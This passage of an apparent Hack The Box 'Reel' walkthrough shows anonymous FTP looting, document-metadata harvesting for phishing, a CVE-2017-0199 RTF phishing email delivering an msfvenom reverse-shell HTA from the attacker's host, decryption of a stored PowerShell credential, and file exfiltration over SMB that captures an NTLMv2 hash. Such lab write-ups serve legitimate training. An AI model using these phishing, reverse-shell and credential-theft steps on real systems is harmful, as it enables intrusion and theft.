SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -2s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2021-01-12T16:19:31+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-01-12T16:19:32
|_ start_date: 2021-01-12T16:10:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.48 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 21 so let's investigate it:
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
→ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:nothing): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> mget *
mget AppLocker.docx?
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 9 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
2047 bytes received in 0.03 secs (63.6166 kB/s)
mget readme.txt?
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
124 bytes received in 0.03 secs (3.6738 kB/s)
mget Windows Event Forwarding.docx?
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 51 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
14581 bytes received in 0.07 secs (200.3977 kB/s)
ftp> ^C
ftp> exit
221 Goodbye.
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ l
total 32K
drwxr-xr-x 2 nothing nothing 4.0K Jan 12 17:29 .
drwxr-xr-x 3 nothing nothing 4.0K Jan 12 17:29 ..
-rw-r--r-- 1 nothing nothing 2.0K Jan 12 17:27 AppLocker.docx
-rw-r--r-- 1 nothing nothing 122 Jan 12 17:27 readme.txt
-rw-r--r-- 1 nothing nothing 15K Jan 12 17:27 'Windows Event Forwarding.docx'
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.%
Let's use exiftool to check out the metadata of these files since readme didn't give us anything specific:
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ exiftool AppLocker.docx
ExifTool Version Number : 12.13
File Name : AppLocker.docx
Directory : .
File Size : 2047 bytes
File Modification Date/Time : 2021:01:12 17:27:13+01:00
File Access Date/Time : 2021:01:12 17:27:13+01:00
File Inode Change Date/Time : 2021:01:12 17:29:40+01:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0008
Zip Compression : Deflated
Zip Modify Date : 2018:05:29 00:19:50
Zip CRC : 0x3cdd8b4f
Zip Compressed Size : 166
Zip Uncompressed Size : 284
Zip File Name : _rels/.rels
Not much in AppLocker.docx. However, in the last file we see some more useful information:
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.13
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 KiB
File Modification Date/Time : 2021:01:12 17:27:15+01:00
File Access Date/Time : 2021:01:12 17:31:26+01:00
File Inode Change Date/Time : 2021:01:12 17:29:48+01:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
This time we get a bit more information, such as the creator **nico@megabank.com**, which gives us both a username, **nico**, and the domain name **megabank.com**. Let's add the domain to our hosts file:
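exiftool shows the fields, but when a share holds dozens of documents you want to harvest creators, editors and e-mail domains from all of them in one go. As an added example (not part of the writeup), here is a Python script that reads docProps/core.xml straight out of the OOXML zip, which is where exiftool's Creator field comes from, and splits what it finds into e-mail addresses, domains and bare usernames. The sample document is constructed in memory with a creator of nico@megabank.com, the value the real file carried; it is not the file from the box.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used in docProps/core.xml of docx/xlsx/pptx files
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
# The core properties that tend to leak identities and timelines
FIELDS = {
    "creator": "dc:creator",
    "lastModifiedBy": "cp:lastModifiedBy",
    "description": "dc:description",
    "created": "dcterms:created",
    "modified": "dcterms:modified",
}
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def docx_core_properties(data: bytes) -> dict:
    """Return the interesting core properties of an OOXML file held in memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if "docProps/core.xml" not in z.namelist():
            return {}  # stripped metadata, or not an Office document
        root = ET.fromstring(z.read("docProps/core.xml"))
    props = {}
    for key, path in FIELDS.items():
        el = root.find(path, NS)
        if el is not None and el.text:
            props[key] = el.text.strip()
    return props


def harvest_identities(props: dict) -> dict:
    """Split creator/lastModifiedBy into e-mail addresses, domains and usernames."""
    emails, domains, users = set(), set(), set()
    for key in ("creator", "lastModifiedBy"):
        value = props.get(key, "")
        found = EMAIL_RE.findall(value)
        for addr in found:
            emails.add(addr)
            users.add(addr.split("@")[0])
            domains.add(addr.split("@")[1].lower())
        if value and not found:
            users.add(value)  # a bare Windows username, e.g. "Administrator"
    return {"emails": emails, "domains": domains, "users": users}


def build_sample_docx(creator: str, last_modified_by: str) -> bytes:
    """Constructed minimal docx: a zip with just the parts this script reads."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s">'
        "<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        "<dcterms:created>2017-10-31T18:42:00Z</dcterms:created>"
        "</cp:coreProperties>"
    ) % (NS["cp"], NS["dc"], NS["dcterms"], creator, last_modified_by)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()


if __name__ == "__main__":
    props = docx_core_properties(build_sample_docx("nico@megabank.com", "Administrator"))
    print(props)
    print(harvest_identities(props))
```

Run it over every file pulled from the FTP share and you get the candidate user list and the mail domain for the phishing step in one pass; the created/modified timestamps also tell you how stale a document, and the account behind it, may be.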
[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.77 megabank.com' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 megabank.com
PING megabank.com (10.10.10.77) 56(84) bytes of data.
64 bytes from megabank.com (10.10.10.77): icmp_seq=1 ttl=127 time=450 ms
--- megabank.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 450.267/450.267/450.267/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
So let's open up the docx document and see what's in it using libreoffice:
![](prg/11/1.png)
However that's about it for FTP. Now let's move on to the SMTP port, which is where we need to send a phishing e-mail with a malicious .rtf attachment to the nico user, as the readme hinted (nico converts RTF procedures, so the attachment will get opened in Word). We're going to use [CVE-2017-0199](https://www.exploit-db.com/exploits/41934), the Office OLE2Link bug that makes Word fetch and execute a remote HTA referenced from the RTF:
First we generate the HTA file:
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.9 LPORT=9001 -f hta-psh -o msfv.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7431 bytes
Saved as: msfv.hta
[term2]
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
→ nc -lvnp 9001
listening on [any] 9001 ...
Note that this msfv.hta file is going to trigger the reverse shell connection back to us on port **9001** so don't forget to have your netcat ready
Then we generate the RTF file:
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ git clone https://github.com/bhdresh/CVE-2017-0199
Cloning into 'CVE-2017-0199'...
remote: Enumerating objects: 298, done.
remote: Total 298 (delta 0), reused 0 (delta 0), pack-reused 298
Receiving objects: 100% (298/298), 288.09 KiB | 1.20 MiB/s, done.
Resolving deltas: 100% (102/102), done.
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ cd CVE-2017-0199
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
→ python2 cve-2017-0199_toolkit.py -M gen -w nihilist.rtf -u http://10.10.16.9/msfv.hta -t rtf -x 0
Generating normal RTF payload.
Generated nihilist.rtf successfully
Note the **-u** parameter which is going to be the URL from which the box is going to get the **msfv.hta** file from, and next step is to send the phishing email with the **sendEmail** utility:
[term1]
[ 10.10.16.9/23 ] [ /dev/pts/16 ] [~/HTB/Reel]
→ ls -lash msfv.hta; sudo python3 -m http.server 80
8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
[term2]
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
→ sendEmail -f nihilist@megabank.com -t nico@megabank.com -u "check the attached file" -m "very important mail" -a nihilist.rtf -s 10.129.179.102 -v
Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Connecting to 10.129.179.102:25
Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => My IP address is: 10.10.16.9
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 220 Mail Service ready
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: EHLO nowhere
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: MAIL FROM:<nihilist@megabank.com>
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: RCPT TO: <nico@megabank.com>
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: DATA
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 354 OK, send.
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending message body
Dec 26 19:08:30 nowhere sendEmail[885036]: Setting content-type: text/plain
Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Sending the attachment [nihilist.rtf]
Dec 26 19:08:43 nowhere sendEmail[885036]: SUCCESS => Received: 250 Queued (12.220 seconds)
Dec 26 19:08:43 nowhere sendEmail[885036]: Email was sent successfully! From: <nihilist@megabank.com> To: <nico@megabank.com> Subject: [check the attached file] Attachment(s): [nihilist.rtf] Server: [10.129.179.102:25]
Then we need to wait a few minutes for nico to fall for the phishing attempt, and we get a shell:
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.9] from (UNKNOWN) [10.129.179.102] 51538
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
htb\nico
And we got a reverse shell connection! We are now logged in as the nico user, so let's see if we can get the user flag:
C:\Windows\system32>cd ../../
cd ../../
C:\>cd Users\
cd Users\
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users
03/11/2017 23:09 <DIR> .
03/11/2017 23:09 <DIR> ..
25/10/2017 20:48 <DIR> .NET v2.0
25/10/2017 20:48 <DIR> .NET v2.0 Classic
01/11/2017 21:58 <DIR> .NET v4.5
01/11/2017 21:58 <DIR> .NET v4.5 Classic
16/02/2018 23:29 <DIR> Administrator
04/11/2017 23:05 <DIR> brad
30/10/2017 23:00 <DIR> claire
25/10/2017 20:48 <DIR> Classic .NET AppPool
03/11/2017 23:09 <DIR> herman
31/10/2017 22:27 <DIR> julia
26/12/2021 12:30 <DIR> nico
22/08/2013 15:39 <DIR> Public
28/10/2017 21:32 <DIR> SSHD
16/11/2017 22:35 <DIR> tom
0 File(s) 0 bytes
16 Dir(s) 15,739,142,144 bytes free
C:\Users>cd nico
cd nico
C:\Users\nico>cd desktop
cd desktop
C:\Users\nico\Desktop>type user.txt
type user.txt
faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we got the user flag!
## **Part 3 : Getting Root Access**
Now on nico's desktop we see the following:
C:\Users\nico\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\nico\Desktop
28/05/2018 20:07 <DIR> .
28/05/2018 20:07 <DIR> ..
27/10/2017 23:59 1,468 cred.xml
27/10/2017 23:40 32 user.txt
2 File(s) 1,500 bytes
2 Dir(s) 15,739,027,456 bytes free
C:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
This **cred.xml** file is the output of the **Export-CliXml** command: the password is stored as an encrypted SecureString, and since it can be decrypted from the account we are running as, we can get tom's password out of it:
C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
UserName : Tom
Password : **1ts-mag1c!!!**
SecurePassword : System.Security.SecureString
Domain : HTB
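The same cred.xml, looked at from the defender's side. This is an added example, not code from the original post or from the box: it parses the CliXml serialisation of a PSCredential, reports which account it holds and checks whether the SecureString payload carries the DPAPI blob header (version 1 followed by the DPAPI provider GUID), which is what a hunt for credentials at rest would flag. The function names are mine and the sample file is constructed; its blob bytes after the header are placeholders, not the blob from the writeup.

```python
"""Find Export-CliXml credential files and report what they hold.

Added example for this writeup, not code from the original post. On Windows,
Export-CliXml writes the PSCredential password as a DPAPI blob tied to the
exporting user's profile, so Import-CliXml run as that user (as done from the
shell above) returns the plaintext. This script parses the CliXml, reports
the account name and checks for the DPAPI blob signature.
"""
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# DPAPI blob header: version 1 followed by the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian byte order.
DPAPI_BLOB_PREFIX = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample in the shape of the cred.xml found on the box; the bytes
# after the DPAPI header are placeholders.
SAMPLE_CLIXML = """\
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
 <Obj RefId="0">
  <TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
  <ToString>System.Management.Automation.PSCredential</ToString>
  <Props>
   <S N="UserName">HTB\\Tom</S>
   <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb00000000000000000000000000000000</SS>
  </Props>
 </Obj>
</Objs>
"""


def is_dpapi_blob(hex_text):
    """True when the SecureString payload starts with the DPAPI header."""
    try:
        raw = bytes.fromhex(hex_text.strip())
    except ValueError:
        return False
    return raw.startswith(DPAPI_BLOB_PREFIX)


def find_pscredentials(clixml_text):
    """One finding per serialised PSCredential: account name, whether the
    Password property is a SecureString, and whether it is a DPAPI blob."""
    ns = {"ps": PS_NS}
    root = ET.fromstring(clixml_text)
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        types = {t.text for t in obj.findall("ps:TN/ps:T", ns)}
        if "System.Management.Automation.PSCredential" not in types:
            continue
        user = obj.find("ps:Props/ps:S[@N='UserName']", ns)
        secret = obj.find("ps:Props/ps:SS[@N='Password']", ns)
        blob = secret.text if secret is not None else ""
        findings.append({
            "username": user.text if user is not None else None,
            "secure_string": secret is not None,
            "dpapi_protected": is_dpapi_blob(blob),
        })
    return findings


if __name__ == "__main__":
    for finding in find_pscredentials(SAMPLE_CLIXML):
        print(finding)
```

The check only looks at the header, so it tells you a file contains a DPAPI-protected credential, not whether the current account can decrypt it; the mitigation on the box would have been to not leave an exported credential in a user's profile at all.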
And we have tom's password! Now let's ssh as the tom user using his password:
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ ssh tom@megabank.com
The authenticity of host 'megabank.com (10.129.179.102)' can't be established.
ED25519 key fingerprint is SHA256:fIZnS9nEVF3o86fEm/EKspTgedBr8TvFR0i3Pzk40EQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'megabank.com' (ED25519) to the list of known hosts.
tom@megabank.com's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
And we now have a shell as tom! Let's take a look around:
tom@REEL C:\Users\tom>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom
11/16/2017 10:35 PM <DIR> .
11/16/2017 10:35 PM <DIR> ..
10/27/2017 11:38 PM <DIR> Contacts
05/29/2018 07:57 PM <DIR> Desktop
10/27/2017 11:38 PM <DIR> Documents
10/29/2017 09:08 PM <DIR> Downloads
10/27/2017 11:38 PM <DIR> Favorites
10/27/2017 11:38 PM <DIR> Links
10/27/2017 11:38 PM <DIR> Music
10/27/2017 11:38 PM <DIR> Pictures
10/27/2017 11:38 PM <DIR> Saved Games
10/27/2017 11:38 PM <DIR> Searches
10/27/2017 11:38 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom>cd Desktop
tom@REEL C:\Users\tom\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop
05/29/2018 07:57 PM <DIR> .
05/29/2018 07:57 PM <DIR> ..
05/29/2018 08:02 PM <DIR> AD Audit
0 File(s) 0 bytes
3 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom\Desktop>cd "AD Audit"
tom@REEL C:\Users\tom\Desktop\AD Audit>
tom@REEL C:\Users\tom\Desktop\AD Audit>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 08:02 PM <DIR> .
05/29/2018 08:02 PM <DIR> ..
05/29/2018 11:44 PM <DIR> BloodHound
05/29/2018 08:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
The note hints that an AD audit was done, so let's see whether we have access to any interesting BloodHound files:
tom@REEL C:\Users\tom\Desktop\AD Audit>cd BloodHound
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
05/29/2018 11:44 PM <DIR> .
05/29/2018 11:44 PM <DIR> ..
05/29/2018 07:57 PM <DIR> Ingestors
10/30/2017 10:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>cd Ingestors
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
05/29/2018 07:57 PM <DIR> .
05/29/2018 07:57 PM <DIR> ..
11/16/2017 11:50 PM 112,225 acls.csv
10/28/2017 08:50 PM 3,549 BloodHound.bin
10/24/2017 03:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 03:27 PM 568,832 SharpHound.exe
10/24/2017 03:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,736,729,600 bytes free
So let's transfer the bloodhound files back to our local machine:
[term 1]
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
→ impacket-smbserver -smb2support nihilist .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[term 2]
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>copy * \\10.10.16.9\nihilist\
acls.csv
BloodHound.bin
BloodHound_Old.ps1
SharpHound.exe
SharpHound.ps1
5 file(s) copied.
[term 1]
[*] Incoming connection (10.129.179.102,61795)
[*] AUTHENTICATE_MESSAGE (HTB\tom,REEL)
[*] User REEL\tom authenticated successfully
[*] tom::HTB:aaaaaaaaaaaaaaaa:97ed7e26f0ec5b28ae6cb130414917ed:0101000000000000809d2c0658fbd70124aa28f4ea690e2f00000000010010007700660056004200780073004100710003001000770066005600420078007300410071000200100043007700570048007300450056005300040010004300770057004800730045005600530007000800809d2c0658fbd701060004000200000008003000300000000000000000000000003000005085ea7922d5329d13836e2e2a7350eacf7ee793c7c9205c7ad5e64f5183febb0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:nihilist)
^C
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
→ ls -lash
total 1.6M
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 20:29 .
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 25 21:26 ..
112K -rwxr-xr-x 1 nothing nothing 110K May 29 2018 acls.csv
4.0K -rwxr-xr-x 1 nothing nothing 3.5K Oct 29 2017 BloodHound.bin
244K -rwxr-xr-x 1 nothing nothing 241K Oct 29 2017 BloodHound_Old.ps1
4.0K drwxr-xr-x 4 nothing nothing 4.0K Dec 26 19:00 CVE-2017-0199
8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
556K -rwxr-xr-x 1 nothing nothing 556K Oct 29 2017 SharpHound.exe
624K -rwxr-xr-x 1 nothing nothing 623K Oct 29 2017 SharpHound.ps1
Now that we have transferred the files back to our machine, let's inspect them using BloodHound:
[ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
→ sudo apt install neo4j
[ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
→ sudo neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
2021-12-27 20:10:00.054+0000 INFO Starting...
2021-12-27 20:10:00.455+0000 INFO This instance is ServerId{39ac0325} (39ac0325-ca50-4041-ba6d-444c78dc4026)
2021-12-27 20:10:02.130+0000 INFO ======== Neo4j 4.4.2 ========
2021-12-27 20:10:03.469+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2021-12-27 20:10:03.473+0000 INFO Setting up initial user from defaults: neo4j
2021-12-27 20:10:03.474+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2021-12-27 20:10:03.481+0000 INFO Setting version for 'security-users' to 3
2021-12-27 20:10:03.483+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2021-12-27 20:10:03.488+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2021-12-27 20:10:03.700+0000 INFO Bolt enabled on localhost:7687.
2021-12-27 20:10:04.423+0000 INFO Remote interface available at http://localhost:7474/
2021-12-27 20:10:04.428+0000 INFO id: AC467907227285E4E491280BBC436619BBDF6A413FD78BD3F4BCB8455310E603
2021-12-27 20:10:04.428+0000 INFO name: system
2021-12-27 20:10:04.428+0000 INFO creationDate: 2021-12-27T20:10:02.593Z
2021-12-27 20:10:04.428+0000 INFO Started.
Then go to **http://127.0.0.1:7474** and log in with the default credentials **neo4j:neo4j**:
![](prg/11/2.png)
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.0.3/BloodHound-linux-x64.zip
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ mkdir Bloodhound
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ mv BloodHound-linux-x64.zip Bloodhound/
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ cd Bloodhound
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
→ unzip BloodHound-linux-x64.zip
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
→ ls -l
total 100032
drwxrwxr-x 5 nothing nothing 4096 Jul 15 20:13 BloodHound-linux-x64
-rw-r--r-- 1 nothing nothing 102425633 Dec 8 05:47 BloodHound-linux-x64.zip
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
→ cd BloodHound-linux-x64
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
→ ls -l
total 175752
